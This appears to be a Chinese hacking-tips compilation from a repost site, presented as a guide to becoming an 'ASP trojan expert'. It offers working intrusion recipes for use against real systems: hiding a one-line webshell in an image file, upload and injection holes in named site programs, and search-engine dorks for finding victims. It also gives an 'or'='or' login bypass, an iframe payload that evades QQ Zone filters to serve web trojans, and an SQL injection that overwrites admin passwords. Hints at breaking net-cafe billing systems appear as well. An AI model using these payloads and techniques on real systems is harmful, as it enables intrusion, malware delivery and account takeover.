菜鸟是如何变成ASP木马高手的!1.名称:如何制作图片ASP木马
建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->
找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultr... 09-06-09
12. 动画名称:媒体中国整站程序存在多处漏洞
漏洞程序:媒体中国整站程序(第一版)
官方网站:http://meiti.elgod.com/
漏洞: %5c(暴库) 上传 注入
上传页面:down1/upload.asp
13. 名称:免费电话+msh命令行工具
http://www.globe7.com/ 打开主页,点击坐下角,free download,下载到本地,安装,
运行后,会提示正在寻找你所在地区的区号。由于是国际长途,注册一个帐号,送100美分,国内计时0.01/分,你就有100分钟可以白打。是一个帐号哦。
要注意的就是,固定电话,小灵通 形式为0086521123456 521本来时0521,要省略前面的零,手机号也是一样。
14. 名称:bo-blog的新漏洞
http://网址/index.php?job=../admin/ban
把其中"禁止搜索的词"那部分<table>另存出来,里面的地址改完整,插入一句话木马
15. 名称:钩魂者入侵传奇私服
用百度 搜索 传奇 inurl:tuku
或者 传奇 inurl:wplm.htm
再或者 传奇 inurlsites.asp
友情链接里插入一句话木马即可
16. 程序: 宏达企业整站上传漏洞
官方主页:http://www.mu126.com/
漏洞页面:/cx/upfile.asp (上传漏洞)
17.无间盗邮箱,在修改密码里,用户名和密码里添'or'='or'
18.名称: bbsxp5.16后台得到webshell
bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传,就是在基本设置上添加上上传类型也不行,并禁止了修改数据备份数据名称,我们可以把此网页保存在本地,改源代码上传。
19.名称:jhackj 2005年最新精典教程
下载看看吧,不错,各大网站都有
20.名称:省力入侵韩国肉鸡
在啊d的扫描注入点项,打开这个:http://www.google.co.kr/advanced_search?hl=zh-cn
这是高级搜索项,关键字随便写。这里我写asp?name= 设置为每页显示100条。
语种选择韩文。搜索,很多sa.
21.名称:任何网吧的管理系统破解
选智能abc,然后vv输入,光标后退两步,按delete键 刚输入的两个vv删除, 最后按inter键
22.名称:破解qq空间插入网页木马的代码
现在腾讯 已经封了很多qq空间代码了 就如 以前 <iframe src="木马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>插入网页木马的代码也早被封了
突破禁用的方法 代码如下:
<div id=di><img src="javascript :di.innerhtml=\'<iframe src=木马地址 width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\'" style=display:none></div>
最后附上总结的
1.上传漏洞[不多讲]
ps: 如果看到:选择你要上传的文件 [重新上传]或者出现"请登陆后使用",80%就有漏洞了!
有时上传不一定会成功,这是因为cookies不一样.我们就要用wsockexpert取得cookies.再用domain上传.
2.注入漏洞[不多讲]
ps:对md5密码.有时我们不是哪么容易跑出来.如果是[sql数据库].那么我们可以用以下命令:
http://注入网址;update admin set password=\'新md5密码\' where password=\'旧md5密码\'-- [admin为表名.]
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
我要评论
发表评论